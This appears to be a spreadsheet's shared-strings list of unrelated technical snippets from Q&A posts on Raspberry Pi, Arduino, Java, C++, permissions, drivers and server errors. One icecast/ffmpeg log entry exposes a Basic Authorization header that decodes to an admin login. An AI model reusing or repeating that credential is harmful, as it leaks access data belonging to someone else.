    <t>The webkit-mask (implemented as -webkit-mask) is the main property of a group of CSS3 properties used for applying masks to images.</t>
  </si>
  <si>
    <t>If a driver is not signed using a valid certificate or if the driver was signed using a certificate which has been revoked by Microsoft or the certificate authority, Windows will refuse to load the driver.</t>
  </si>
  <si>
    <t>Tampermonkey differs from native Chrome userscripts in that Tampermonkey supports almost all of the Greasemonkey API, and Tampermonkey scripts are now easier to install and manage than native userscripts.</t>
  </si>
  <si>
    <t>If you have operations in your loop() that you want protected from interrupts, you have the ability to disable interrupts
see noInterupts()</t>
  </si>
  <si>
    <t>More than likely when you execute the  library from the CLI you're logged in as someone with sudoer permissions or the like, who can easily execute this.</t>
  </si>
  <si>
    <t>The only elements that can be validated are select, textarea, certain input types, and certain elements containing the contenteditable attribute.</t>
  </si>
  <si>
    <t>Lookup tables are also used extensively to validate input values by matching against a list of valid (or invalid) items in an array and, in some programming languages, may include pointer functions (or offsets to labels) to process the matching input.</t>
  </si>
  <si>
    <t>I don't know how to disable watchdog using arduino, but I can tell you how to disable it using  and its make menuconfig
Open menuconfig: make menuconfig
Enter component config
Enter ESP32-specific
Remove star from interrupt watchdog
P.S.</t>
  </si>
  <si>
    <t>For safety reasons, I want the function to test if the operand belongs to the specific enum type.</t>
  </si>
  <si>
    <t>While your code compiles it is not technically valid C++, you get away with it thanks to the Arduino software that does some mangling and what not to allow using functions before they are declared.</t>
  </si>
  <si>
    <t>It's something to do with permissions - I'm not an expert here :-)
So my RunOnReceive line is { sudo /home/pi/procSMS.sh $SMS_1_TEXT }
The script didn't seem to know what $SMS_1_TEXT was, so I passed it through as a parameter - inside the script it's treated as $1.</t>
  </si>
  <si>
    <t>ASA job query:
Azure Function (HttpTrigger):
run.csx
}
function.json
    {
      "bindings": [
       {
           "authLevel": "function",
           "name": "body",
           "type": "httpTrigger",
           "direction": "in",
           "methods": [
             "get",
             "post"
             ]
      },
      {
          "name": "blobContainer",
          "type": "blob",
          "path": "myContainer",
          "connection": "mySTORAGE",
          "direction": "out"
      },
      {
          "name": "$return",
          "type": "http",
          "direction": "out"
      }
      ]
 }</t>
  </si>
  <si>
    <t>[2017-04-10 15:19:14,675] [IoT-Core] ERROR - auth-module {/app/modules/oauth/token-handlers.js} Could not set up encoded tenant based client credentials to session context as the server is unable to obtain such credentials - setUpEncodedTenantBasedClientAppCredentials(x)
[2017-04-10 15:19:15,848] [IoT-Core]  WARN - CarbonAuthenticationUtil Failed Administrator login attempt 'admin[-1234]' at [2017-04-10 15:19:15,848+0200]
[2017-04-10 15:19:15,849] [IoT-Core]  WARN - AuthenticationHandler Illegal access attempt at [2017-04-10 15:19:15,0849] from IP address IPAddressOfServer while trying to authenticate access to service APIKeyValidationService
[2017-04-10 15:19:15,854] [IoT-Core]  WARN - APIAuthenticationHandler API authentication failure due to Unclassified Authentication Failure
[2017-04-10 15:19:15,963] [IoT-Core]  WARN - CarbonAuthenticationUtil Failed Administrator login attempt 'admin[-1234]' at [2017-04-10 15:19:15,963+0200]
[2017-04-10 15:19:15,964] [IoT-Core]  WARN - AuthenticationHandler Illegal access attempt at [2017-04-10 15:19:15,0964] from IP address IPAddressOfServer while trying to authenticate access to service APIKeyValidationService
[2017-04-10 15:19:15,968] [IoT-Core]  WARN - APIAuthenticationHandler API authentication failure due to Unclassified Authentication Failure
[2017-04-10 15:19:51,052] [IoT-Core] ERROR - BasicAuthenticationInterceptor Authentication failed.</t>
  </si>
  <si>
    <t>It seems newer versions of Raspbian disable ssh by default:
In the past, SSH was enabled by default, so people using their Pi
  headless could easily update their SD card to a new image.</t>
  </si>
  <si>
    <t xml:space="preserve">
You should be able to call the base class's private and protected methods from the derived class, unless I'm missing something.</t>
  </si>
  <si>
    <t>The authentication is invalidated:
when an error occures (status != 00 and != AF),
when SelectApplication is executed,
after the same key has been changed that was used for authentication,
when another card comes into the RF field (don't forget to reset your variables).</t>
  </si>
  <si>
    <t># "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server.</t>
  </si>
  <si>
    <t>So I go right click on my device, "Update Driver Software", "Browse my computer for driver software", "Let me pick from a list of device drivers on my computer", "Have disk..." and select myfile.inf
It shows "My Own Device" under the model, and says "This driver has an Authenticode(tm) signature."</t>
  </si>
  <si>
    <t>UPDATE:
OK I added the ability for the app to look at a custom set of ENV vars first and then if they are not present then fall back to using the default ENV vars provided by the lambda function for credentials.</t>
  </si>
  <si>
    <t>Once you have gone through the steps to add "device type", that type will then be available to select when you add device and you can choose it as the type to add, then click next and the screen will have a place to add device ID.</t>
  </si>
  <si>
    <t>In addition to serving as a standalone class, this class provides protected functionality that may be useful when creating customized task classes.</t>
  </si>
  <si>
    <t>This is a C++ programming technique that allows templates to verify properties about their template parameters, thus allowing different specializations to be used if certain kinds of objects are available.</t>
  </si>
  <si>
    <t>and corresponding pins on P8 and P9 headers are enabled and some others are disabled.</t>
  </si>
  <si>
    <t>The term  means that the javac compiler does not have enough type information to perform all type checks necessary to ensure type safety.</t>
  </si>
  <si>
    <t>I believe I'm just going to keep a list of ssh usernames, ssh passwords, and pagekite addresses, then write a script that loops through them and rsync's my local directory with the new code to the remote directory on the pi.</t>
  </si>
  <si>
    <t>The object in question must be the target of a  statement so that the current thread can obtain a lock on the monitor associated with it.</t>
  </si>
  <si>
    <t>Delegates, especially with lexical closure support for anonymous methods (C# 2.0) and lambda expressions (C# 3.0), allow the language to be used for functional programming.</t>
  </si>
  <si>
    <t>java.lang.ClassFormatError is thrown when the JVM (Java Virtual Machine) attempts to read a class file and determines that the file is malformed or otherwise cannot be interpreted as a class file.</t>
  </si>
  <si>
    <t>Following these posts 1 and
2, I tried
sudo find / -type s
resulting in this output:
/run/php5-fpm.sock
/run/fail2ban/fail2ban.sock
/run/thd.socket
/run/dhcpcd.unpriv.sock
/run/dhcpcd.sock
/run/dbus/system_bus_socket
/run/avahi-daemon/socket
/run/udev/control
/run/systemd/journal/syslog
/run/systemd/journal/socket
/run/systemd/journal/stdout
/run/systemd/journal/dev-log
/run/systemd/shutdownd
/run/systemd/private
/run/systemd/notify
find: `/proc/30933/task/30933/fd/5': No such file or directory
find: `/proc/30933/task/30933/fdinfo/5': No such file or directory
find: `/proc/30933/fd/5': No such file or directory
find: `/proc/30933/fdinfo/5': No such file or directory
In the processes with top on the other hand, mysqld and mysqld_safe show up.</t>
  </si>
  <si>
    <t>Data synchronizes when connectivity returns
Handles the complexity of realtime synchronization and provides flexible conflict resolution
Accessible directly from client SDKs, or from your server with the REST API
Related tags
firebase
firebase-tools
firebase-security
firebase-storage
firebase-analytics
nosql
Firebase Realtime Database for SQL Developers (video series)</t>
  </si>
  <si>
    <t>Swift promises to modernize the developer experience over what Objective-C provides, offering features like:
Generics
Type safety
Type inference
Namespaces
Improved safety (some protection from overflow, use-before-initialization, etc.)</t>
  </si>
  <si>
    <t>Newer versions of Arduino IDE achieve the same effect (though more securely) by adding the current user to the dialout group.</t>
  </si>
  <si>
    <t>My point is: make sure you really know your device class before manually adding Sysfs attributes.</t>
  </si>
  <si>
    <t>Use "devcon enable/disable XXXXXX" to enable/disable the device.</t>
  </si>
  <si>
    <t>To expose your List you can try callHandler.registerGlobal(List.class, list)</t>
  </si>
  <si>
    <t>You can use an anonymous type, for instance:</t>
  </si>
  <si>
    <t>When you launch an instance, you associate one or more security groups with the instance.</t>
  </si>
  <si>
    <t>Unlike C function pointers, delegates are object-oriented, type safe, and secure.</t>
  </si>
  <si>
    <t>When I run the dd cmd it gives some errors:
I actually get the files on the SDcard but when I boot the Raspberry Pi, I get a kernel panic:
Unable to mount root filessystem on unknown block
An old forum post recommends:
adding a forcefsck to the end of cmdline.txt on the SDCard.</t>
  </si>
  <si>
    <t>Another possible reason why you may be getting Illegal Instruction error is Code Sourcery cross-toolchain configured for ARMv7 and Raspberry Pi is ARMv6.</t>
  </si>
  <si>
    <t>Trace Actions or Actions
Trace statements that are executed whenever a probe "fires".</t>
  </si>
  <si>
    <t>Here is a gist of a bash script that will do exactly what you want, over SSH, on a Raspberry Pi (or any Linux, really):
https://gist.github.com/free5ty1e/300adb0800ba45f3fe4e
Once you have created the xrdpLogMonitor.sh file, don't forget to set it as executable by typing:
Then execute it by typing:
./xrdpLogMonitor.sh</t>
  </si>
  <si>
    <t>Testing the site, it performed as expected, I did see warnings in the error
file:
[warn] proxy: No protocol handler was valid for the URL /api/socket.</t>
  </si>
  <si>
    <t>A ClassFormatError is thrown when the Java Virtual Machine attempts to read a class file and determines that the file is malformed or otherwise cannot be interpreted as a class file.</t>
  </si>
  <si>
    <t>Although anonymous types are created dynamically they are still inferred at compile time, in contrast with dynamic typing.</t>
  </si>
  <si>
    <t>A  is thrown when the Java Virtual Machine attempts to read a class file and determines that the file is malformed or otherwise cannot be interpreted as a class file.</t>
  </si>
  <si>
    <t>Public vs Private Headers and Classes
Any source in a group named "Private" in the Xcode source list should be considered non-public API, and may be changed at any time, without warning.</t>
  </si>
  <si>
    <t>This means that environment variables that may be declared when you are logged in may not be declared, or might have different values, for cron.</t>
  </si>
  <si>
    <t>Contains four elements , &lt;firebase-auth&gt;, &lt;firebase-document&gt; and &lt;firebase-query&gt;.</t>
  </si>
  <si>
    <t>Thanks in advance,
Jim
PS: I'm not clear as to the difference between enabling/disabling an interrupt (in particular, an interrupt associated with a particular GPIO pin) and masking/unmasking the same GPIO interrupt.</t>
  </si>
  <si>
    <t>When I try to establish a connection, on the server I have this:
[2016-09-07 16:30:59,093] WARN Unexpected error from /192.168.1.104; closing connection (org.apache.kafka.common.network
  .Selector)
  org.apache.kafka.common.network.InvalidReceiveException: Invalid receive (size = 270204932 larger than 104857600)
          at org.apache.kafka.common.network.NetworkReceive.readFromReadableChannel(NetworkReceive.java:91)
          at org.apache.kafka.common.network.NetworkReceive.readFrom(NetworkReceive.java:71)
          at org.apache.kafka.common.network.KafkaChannel.receive(KafkaChannel.java:154)
          at org.apache.kafka.common.network.KafkaChannel.read(KafkaChannel.java:135)
          at org.apache.kafka.common.network.Selector.pollSelectionKeys(Selector.java:323)
          at org.apache.kafka.common.network.Selector.poll(Selector.java:283)
          at kafka.network.Processor.poll(SocketServer.scala:472)
          at kafka.network.Processor.run(SocketServer.scala:412)
          at java.lang.Thread.run(Thread.java:745)</t>
  </si>
  <si>
    <t>New features in Service Pack 3
NX APIs for application developers to enable Data Execution Prevention for their code, independent of system-wide compatibility enforcement settings
Turns black hole router detection on by default
Support for SHA-2 signatures in X.509 certificates
Network Access Protection client
Group Policy support for IEEE 802.1X authentication for wired network adapters.</t>
  </si>
  <si>
    <t>EDIT: The 'uninitialized value' warning does not occur when apache headers are not installed.</t>
  </si>
  <si>
    <t>The error below occurred when an existing device that has been enrolled with IoT DPS is updated with the code below:
Executed 'MyFunction' (Failed, Id=xxx)
       System.Private.CoreLib: Exception while executing function: MyFunction.</t>
  </si>
  <si>
    <t>assembly:System.Core, Version=4.0.0.0,
  Culture=neutral, PublicKeyToken=b77a5c561934e089 type:
  member:
This led me to this github issue: https://github.com/NLog/NLog/issues/905
Where if I installed libmono-system-servicemodel4.0a-cil onto the target raspberry pi with apt-get, then it works!</t>
  </si>
  <si>
    <t>For hiding segments of webpages, several options exist, such as the setting CSS  property to none and jquery hide method.</t>
  </si>
  <si>
    <t>Where classes of users may be granted varying privileges for access to a file or directory (typically read, write, execute, or variations of those), the owner will have distinct permissions.</t>
  </si>
  <si>
    <t>&gt; Makefile:179: recipe for target 'opengles2.o' failed
&gt; make: *** [opengles2.o] Error 1
 =&gt; source failed verification.</t>
  </si>
  <si>
    <t>The fast and easy solution is to add your current user to the dialout group:
where YOU is your username and then log out and log back in to have those new permissions propagated into your shells.</t>
  </si>
  <si>
    <t>You can either change useUnsecuredWebsockets to True or add a else clause to the if statement to set the default values.</t>
  </si>
  <si>
    <t>Returning a pointer to this variable will immediately make the pointer invalid.</t>
  </si>
  <si>
    <t>To set validation rules you will use the  function:
The above function takes three parameters as input:
The field name - the exact name you've given the form field.</t>
  </si>
  <si>
    <t>The alternative to defining mutator and accessor methods, or property blocks, is to give the instance variable some visibility other than private and access it directly from outside the objects.</t>
  </si>
  <si>
    <t>A wrapper is an OOP technique where an object encapsulates (wraps) another object, resource (dynamically allocated memory, OS file/widow handle, socket, thread mutex, etc) or a set of subroutines, hiding/protecting it and providing another (possibly easier to use) interface.</t>
  </si>
  <si>
    <t>Input encoding
Output encoding
Other coding practices which are not prone to code injection vulnerabilities, such as "parameterized SQL queries" (also known as "prepared statements" and sometimes "bound variables" or "bound values").</t>
  </si>
  <si>
    <t>HP Fortify Runtime platform: Software resident in the application runtime that monitors and/or protects applications from common attacks, unintended use, and targeted hacking.</t>
  </si>
  <si>
    <t>The version used was:
firebase-ui-auth 2.4.0 and firebase 11.0.4.</t>
  </si>
  <si>
    <t>Multiproject builds with  files
Play sub-projects: how to convert to build.sbt
Publishing
Publish sbt artifact to filesystem
Cross-building
Multi-version build with SBT
Setting unique snapshot version when cross-building in SBT
Logging
How to suppress info and success messages in sbt?</t>
  </si>
  <si>
    <t>Common Elements
Other than file names, common file systems also describe and maintain directories and file attributes, which serve as a means to further structure data organization and to give files specific purposes, security features or functionality.</t>
  </si>
  <si>
    <t>What you don't need to include in the public header files are the declarations or definitions of internal private functions or data types.</t>
  </si>
  <si>
    <t>It's done as follows:
Note: reinitialising MaterialLayout on an already upgraded element is an issue, thus have added the check to see if the element has already been upgraded or not.</t>
  </si>
  <si>
    <t>Anyway, in order to express that you rely on a data member to be "zero" without enforcing in other ways that non-initialized entries will not be accessed, I'd make the initialization explicit, e.g.</t>
  </si>
  <si>
    <t>The following invariant states, that all person names should be unique:
Note, that OCL provides the built in operation  to access all instances of a class.</t>
  </si>
  <si>
    <t>Both cron rc.local I have tried every different permission setting as well as first running a bash to then run a Python script.</t>
  </si>
  <si>
    <t>You can find out file permissions with ls -la you will also see owner and owner group.</t>
  </si>
  <si>
    <t>Put this script into the  directory, so it will be executed before login.</t>
  </si>
  <si>
    <t>The owners and permissions on home directory,  directory should be the following:
chmod g-w /home/your_user
chmod 700 /home/your_user/.ssh
chmod 600 /home/your_user/.ssh/authorized_keys</t>
  </si>
  <si>
    <t>When the members of a class are `protected`, there is restricted access to these members for other classes.</t>
  </si>
  <si>
    <t>Use for questions about Scala's placeholder syntax for anonymous functions.</t>
  </si>
  <si>
    <t>An anonymous class is a local class without a name.</t>
  </si>
  <si>
    <t>greasemonkey -- Many of the scripts and techniques, used with Greasemonkey, will work with Tampermonkey.</t>
  </si>
  <si>
    <t>Rather than building out an interface or anonymous class.</t>
  </si>
  <si>
    <t>It identifies group permissions and determines whether to allow access a securable object or process.</t>
  </si>
  <si>
    <t>The  class provides validation on class properties.</t>
  </si>
  <si>
    <t>defaults to 0
hidden Allow transfer of hidden files.</t>
  </si>
  <si>
    <t>It also made little help to deploy large programs: one either had to deploy large monolithic EXE which could cause problems in OSes with 16-bit kernel (Windows 9x/ME), or develop traditional Windows DLL sacrificing all type safety and complex types (passing objects and strings on EXE/DLL or DLL/DLL boundary would be extremely fragile, practically impossible for average programmer).</t>
  </si>
  <si>
    <t>It returns the following error: 
Error: Command failed: /bin/sh -c
  /home/pi/RPi-Computer-Power/RPi-Server/routes/../scripts/hash.js
  12345678 /bin/sh: 1:
  /home/pi/RPi-Computer-Power/RPi-Server/routes/../scripts/hash.js:
  Permission denied
I am extremely confused because when I try to run the script from the command line, it works perfectly;  executes flawlessly.</t>
  </si>
  <si>
    <t>I have created a shell script in the /usr/lib/cgi-bin/
#!/bin/bash
echo "Content-type:text/html\n"
sudo raspistill -vf -n -o /var/www/img/image.jpg --timeout 1200 --metering matrix
echo "Status: 204"
I saved this as capture and made this executable, did nothing with the permissions though.</t>
  </si>
  <si>
    <t>Two objects stored in variable  and b are said to have the same identity, if a and b actually refer to the same object (same class, same abstract memory location).</t>
  </si>
  <si>
    <t>You need to modify bootloader to disable Watchdog on reset or forget about Watchdog at your main app.</t>
  </si>
  <si>
    <t>Since the middle of the year, by default, organizations are configured to reject insecure connections, unless a user specifically enables this (you can find this option in the setting panel in the dashboard if you want to enable unencrypted connectivity in your organization), this is one possible reason you are getting 403 not allowed responses.</t>
  </si>
  <si>
    <t>The most proper way is to use  in the directory : /etc/apache2/sites-available/
The default is pointing to /var/www/
I'm always creating a user for a project and then I point the  Virtual Host and I use SuPHP for the security.</t>
  </si>
  <si>
    <t>In most programming languages we define targets with an 'id' and give it a unique identifier; setting variables that hold a target object, etc.</t>
  </si>
  <si>
    <t>You can manually enable the SSH server according to this raspberrypi.org tutorial :
As of the November 2016 release, Raspbian has the SSH server disabled by default.</t>
  </si>
  <si>
    <t>Beside that kernel driver interrupt handlers will always preempt a user-level process.</t>
  </si>
  <si>
    <t>It supports all defined DNSSEC record types as well as unknown types.</t>
  </si>
  <si>
    <t>And then escalate your permissions with sudo:
shell_exec("cd /home/pi/ &amp;&amp; sudo ./trigger_pin.py 2&gt;&amp;1");
If you do this, be absolutely certain you verify the safety of what your Web server can execute (i.e., don't blindly install Web scripts with reviewing the source code).</t>
  </si>
  <si>
    <t>One of 2 options
The WiFiClientSecure includes a list of public CA certs and is verifying your certificate against this list
The WiFiClientSecure defaults to not verifying remote certs by default.</t>
  </si>
  <si>
    <t>My details are Arduino: 1.8.5 (Windows 8.1), Board: "Arduino/Genuino Uno"
I had to disable driver signature enforcement in windows 8.1 after that I installed drivers from device manager.Once I restarted my PC then only COM4 was displayed in ports list in Arduino IDE.</t>
  </si>
  <si>
    <t>Command Objects are a feature of the Grails web framework, refering to special classes that declare constraints used to validate its instances.</t>
  </si>
  <si>
    <t>From a security point of view, server-side scripts are never visible to the browser as these scripts are executed on the server and emit HTML corresponding to user's input to the page.</t>
  </si>
  <si>
    <t>Protection of the namespace:
Deny access to function closure, globals, defaults and code
Deny access to frame locals
Deny access to types subclasses
 is read only
Deny access to dict methods able to modify a dict, eg.</t>
  </si>
  <si>
    <t>What I realized is that a random person could type in
    for example: http:///cgi-bin/pulse.cgi
and initiate the script without being logged in.</t>
  </si>
  <si>
    <t>A git hook will actually execute a script, which is prohibited on any Git repository server like GitHub, BitBucket or GitLab, for security reason.</t>
  </si>
  <si>
    <t>These user groups can be used for targeting in other Firebase products like notifications, Remote Config and more.</t>
  </si>
  <si>
    <t>To actually get them to accept the data and reconnect to a valid network you'll need to set up a server - either using node.js/tornado/flask that listens on a specific port (to which your app will send the data) and if successfully authenticated (assuming you want authentication) it executes a function that disconnects from their current WiFi network and connects to the new one specified by you.</t>
  </si>
  <si>
    <t>Since you are building your own device based on AOSP, you would need to modify the access permission levels of these two things to match (for example, you could set the group ownership of /sys/class/gpio to system and make your app part of the system group).</t>
  </si>
  <si>
    <t>For starters it may be stripped down to this:
-- load credentials, 'SSID' and 'PASSWORD' declared and initialize in there
dofile("credentials.lua")
function startup()
  if file.open("init.lua") == nil then
    print("init.lua deleted or renamed")
  else
    print("Running")
    file.close("init.lua")
    -- the actual application is stored in 'application.lua'
    -- dofile("application.lua")
  end
end
-- Define WiFi station event callbacks
wifi_got_ip_event = function(T)
  -- Note: Having an IP address does not mean there is internet access!</t>
  </si>
  <si>
    <t>The prevent your sta rejoin the network automatically, before the 'hostapd_cli deauthenticate ' cmd, you could run cmd below to enable allowed macaddr list
hostapd_cli macaddr_acl 1
Assuming the macaddr has not been added in the allowed list it will be prevented to join.</t>
  </si>
  <si>
    <t>There is also the following warning up front about name matching, but it doesn't seem fatal or even necessarily pertinent to having an unrecognized activation function:</t>
  </si>
  <si>
    <t>I do not want to build the kernel driver for FTDI as specified here
The approach I want to go with which I think is most viable is to find/build a simple java wrapper for avrdude that interacts with the usb device at a higher level, this way I can make use of the FTDI java library to execute a command to verify flash.</t>
  </si>
  <si>
    <t>If you don't want to do that then you can execute the script like this:
If you go this route then you don't need to grant execute permissions on the script itself.</t>
  </si>
  <si>
    <t>Spec 6.23.2: Placeholder Syntax for Anonymous Functions</t>
  </si>
  <si>
    <t>: Cannot register package because of a problem with Function element usage:0001 0006: Value is blocked, and not allowed on this bus (0x80073cf6)
So it looks like Microsoft has blocked access to the rfid reader using the Windows.Devices.HumanInterfaceDevice namespace (https://msdn.microsoft.com/en-us/library/windows/apps/windows.devices.humaninterfacedevice.aspx) because it has been classed as being in a a top level application collection.</t>
  </si>
  <si>
    <t>I've built my executable for ARM Linux, I then transferred to my  folder on my raspberry pi and connected with ssh.</t>
  </si>
  <si>
    <t>I put anonymous namespaces around all the problematic definitions I had.</t>
  </si>
  <si>
    <t>As noted in Arduino keypad 4x4 to LCD activate/deactivate you have to keep current state and you have to CLEAR the  and currenPasswordLength.</t>
  </si>
  <si>
    <t>So to the compiler, your file looks like this:
This is not valid C++, and so the compiler throws an error.</t>
  </si>
  <si>
    <t>Unfortunately, disabling interrupts is error-prone - if you forget to do it, you'll have mysterious crashes.</t>
  </si>
  <si>
    <t>The end users browser has no way to know that the script should not be trusted, and will execute the script.</t>
  </si>
  <si>
    <t>Scripts meant for Greasemonkey or Tampermonkey should be tagged greasemonkey-4 or tampermonkey, instead.</t>
  </si>
  <si>
    <t>RiotJS converts the  property in the opts object to a property called riotSrc due to not allowing illegal server requests when using src="" on tags.</t>
  </si>
  <si>
    <t>Sender ID (defined in RFC 4406) is a microsoft protocol derived from spf (hence the identical syntax), which validates one of the message's address header fields defined by RFC 2822.</t>
  </si>
  <si>
    <t>[icecast @ 0x34492c0] No default whitelist set
[http @ 0x344b9e0] Setting default whitelist 'http,https,tls,rtp,tcp,udp,crypto,httpproxy'
[http @ 0x344b9e0] request: SOURCE /listen HTTP/1.1
User-Agent: Lavf/57.31.100
Accept: */*
Connection: close
Host: 127.0.0.1:8000
Content-Type: audio/mpeg
Icy-MetaData: 1
Ice-Name: NFS One Radio
Ice-Public: 0
Authorization: Basic YWRtaW46bWFyc2Jhc2U=
The Output from ffmpeg:
ffmpeg started on 2016-04-09 at 01:06:46
Report written to "ffmpeg-20160409-010646.log"
ffmpeg version N-79262-gae8a13c Copyright (c) 2000-2016 the FFmpeg developers
  built with gcc 4.6 (Debian 4.6.3-14+rpi1)
  configuration: --arch=armel --target-os=linux --enable-gpl --enable-libmp3lame --enable-nonfree
  libavutil      55.</t>
  </si>
  <si>
    <t>I have a problem with executing python script over ssh (using c# and SharpSSH).</t>
  </si>
  <si>
    <t>But, the OS could not recognize the executable and complained it not to be a valid executable.</t>
  </si>
  <si>
    <t>Init code of driver is getting called, and code =&gt;
and dmesg =&gt;
But driver.probe is not registering in i2c subsystem.</t>
  </si>
  <si>
    <t>the function also skips anything hidden as I don't want the user to be able to choose a hidden file.</t>
  </si>
  <si>
    <t>Instead devices that belong to an enrollment group provision using a derived device key.</t>
  </si>
  <si>
    <t>CharacterMask[0][x][0]
This takes the 0th element of CharacterMask, takes the xth element of the result, and then takes the 0th element of that result.</t>
  </si>
  <si>
    <t>When the GPIO driver is probed, it typically registers the GPIO device instance.</t>
  </si>
  <si>
    <t>Second copy is a little more complex because the Common directory that we want to access is protected.</t>
  </si>
  <si>
    <t>Because having two default networks caused the default gateway to be set as the default gateway of eth1.</t>
  </si>
  <si>
    <t>Luckily I had the ssh enabled, apparently this is disabled by default on Raspbian Jessie, so this may not work for all.</t>
  </si>
  <si>
    <t>TLS/SSL by default is disabled in the firmware build configuration.</t>
  </si>
  <si>
    <t>A public method is a method declaration that allows access from other classes external to the current class.</t>
  </si>
  <si>
    <t>An identifier is a name that identifies either a unique object or a unique class of objects.</t>
  </si>
  <si>
    <t>It is also ideal for scripts, automated backups triggered from cron, etc.</t>
  </si>
  <si>
    <t>suPHP is a tool for executing PHP scripts with the permissions of their owners.</t>
  </si>
  <si>
    <t>A class member whose access specifier is public can be used by all other classes in the program.</t>
  </si>
  <si>
    <t>It is a hidden file in a user's home directory and must be owned either by the user executing the command or by the root user.</t>
  </si>
  <si>
    <t>In new LLVM compiler @synthesize is not required, @property creates @synthesize silently and hidden.</t>
  </si>
  <si>
    <t>The deletion is performed recursively and enabled with the  property of the foreign key.</t>
  </si>
  <si>
    <t>By default, the innerHTML-ed content will be sanitized using the $sanitize service.</t>
  </si>
  <si>
    <t>The release build type is not signed by default.</t>
  </si>
  <si>
    <t>As an edge service application, Zuul is built to enable dynamic routing, monitoring, resiliency and security, and more.</t>
  </si>
  <si>
    <t>In PostgreSQL 9.0 or later, PL/pgSQL is installed by default and can also be used in anonymous code blocks using the  statement.</t>
  </si>
  <si>
    <t>I have made the following function at the library:
This function is working, it puts the fingerprints to the buffer 1 and when I call the function to save with the ID it also works.</t>
  </si>
  <si>
    <t>You wouldn't need python for something like this, a simple shell script can do the trick as follows:-
bt-name-ip.sh:
You will need to set the script as an executable and maybe give it root permissions in order for it to run the hciconfig command.</t>
  </si>
  <si>
    <t>without declaring which attributes are protected and which are accessible, malicious users can set any column value in your database, including foreign keys and secure data.</t>
  </si>
  <si>
    <t>My cross compilation of Qt for Pi fails with the error about script-private (which is present and compiled by me, of course).</t>
  </si>
  <si>
    <t>Try to use this:
And the reason is because the enabling and disabling was done only when there is serial data and if you put the if anywhere else it would be checked always.</t>
  </si>
  <si>
    <t>It determines what level of access or visibility a particular property/method/class has.</t>
  </si>
  <si>
    <t>Error 1253 occurs when there is more than one character type or an invalid character type.</t>
  </si>
  <si>
    <t>EDIT:
Error_reporting gives me this: Fatal error: Call to undefined function mcrypt_create_iv() in /var/www/hash.php on line 46
Test.php:
PasswordHash.php:
(script credits go to crackstation.net)</t>
  </si>
  <si>
    <t>In order to carry out the shipment, it is necessary that the type of data sent be of type char,
but when using the code provided by the sensor company, the data I get is a variable of type uint8_t that contains my message encrypted in hexadecimal.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security ' 'LDFLAGS=-Wl,-z,relro'",
 'CONFINCLUDEDIR': '/usr/include',
 'CONFINCLUDEPY': '/usr/include/python2.7',
 'COREPYTHONPATH': ':plat-arm-linux-gnueabihf:lib-tk:lib-old',
 'COVERAGE_INFO': '/build/python2.7-9xgeTe/python2.7-2.7.13/build-shared/coverage.info',
 'COVERAGE_REPORT': '/build/python2.7-9xgeTe/python2.7-2.7.13/build-shared/lcov-report',
 'COVERAGE_REPORT_OPTIONS': '--no-branch-coverage --title "CPython lcov report"',
 'CPPFLAGS': '-I.</t>
  </si>
  <si>
    <t>The following code is from the login form, and is executing once I press "Login":
However, in Linux the form just closes and the following error occurs:
System.TypeLoadException: A type load exception has occurred.</t>
  </si>
  <si>
    <t>You pass uninitialized bytes to the function:
This causes undefined behaviour; one common effect of using uninitialized values is that they may appear to contain some other content that was recently used by another part of the program.</t>
  </si>
  <si>
    <t>Then don't need to lock out interrupts outside of it and you're won't miss interrupts or drop data, and you also won't run the risk of corrupting data structures or putting I/O hardware in an inconsistent state if you forget to lock out interrupts in a vital part of your code.</t>
  </si>
  <si>
    <t>Enabling the default sandbox environment is as
  simple as checking the Enable Entitlements checkbox in Xcode target
  settings, allowing you to begin sandboxing your app.</t>
  </si>
  <si>
    <t>The only reason I could think of, is if objects that are instanciated within "loop()" aren't properly released, and perhaps because of that I would run out of memory when a horde of WiFiClientSecure objects were left lingering.</t>
  </si>
  <si>
    <t>The script succeeds, but now the New-CACertsEdgeDevice script fails with:
New-SelfSignedCertificate : Cannot convert 'System.Object[]' to the
  type 'Microsoft.CertificateServices.Commands.Certificate' required by
  parameter 'Signer'.</t>
  </si>
  <si>
    <t>Make sure you have proper access rights to /dev/ttyACM0, maybe install a udev rule to give you proper privileges,</t>
  </si>
  <si>
    <t>An AMI defines the following parameters:
An operating system, an application server, and applications
A set of permissions that control which AWS accounts can use the AMI to launch instances
A block device mapping that specifies the volumes to attach to the instance when it's launched</t>
  </si>
  <si>
    <t>$textBox); but it still tells me Permission Denied 
After further reading into the libraries I am using I cam across instructions on how to execute the serialOpen function without using sudo or being root I have added the user pi and www-data to the dialout group I have verified this with id pi id www-data.</t>
  </si>
  <si>
    <t>I have downloaded the Example code:
When I execute it, I get the message:
Firmware Version: 0x0 = (unknown)
WARNING: Communication failure, is the MFRC522 properly connected?</t>
  </si>
  <si>
    <t>gitlab-ci.yml
application.properties
Dockerfile
FROM jsurf/rpi-java:latest
VOLUME /tmp
ADD target/ft-backend-0.0.1-SNAPSHOT.jar app.jar
EXPOSE 8080
ENTRYPOINT ["java","-Djava.security.egd=file:/dev/./urandom","-jar","app.jar"]
CMD [""]
I am using the following commands on my Raspberry to launch Docker.</t>
  </si>
  <si>
    <t>The changelog of FileZilla contains some hints on this topic:
Disable insecure RC4 algorithm in FTP over TLS
Reject Diffie-Hellman Groups smaller than 1024 bits when using FTP over TLS to protect against the Logjam attack</t>
  </si>
  <si>
    <t>You have to make the custom build of NodeMCU firmware and make sure that you include "end user setup" module in the build.</t>
  </si>
  <si>
    <t>Classes posting a notification can also include an optional userInfo parameter to pass an object to the receiving class.</t>
  </si>
  <si>
    <t>If you are not logged-in as the pi user (the default one), add your user to the "gpio" group.</t>
  </si>
  <si>
    <t>You need to disable interrupts to protect the buffer.</t>
  </si>
  <si>
    <t>The API uses opaque pointer, a common scheme of struct encapsulation.</t>
  </si>
  <si>
    <t>Having a surrogate key + natural key:
May make the FOREIGN KEYs in child tables slimmer.2
The surrogate never needs to change, and therefore never incurs ON UPDATE CASCADE referential action.</t>
  </si>
  <si>
    <t>Its distinguishing features are a tight integration with Sling and helping make your HTML immune to cross-site scripting by supplying sensible defaults and anti-XSS filters.</t>
  </si>
  <si>
    <t>I am not unable to connect to the device, I am only unable to enumerate devices that are class 02 subclass 02 protocol 01.</t>
  </si>
  <si>
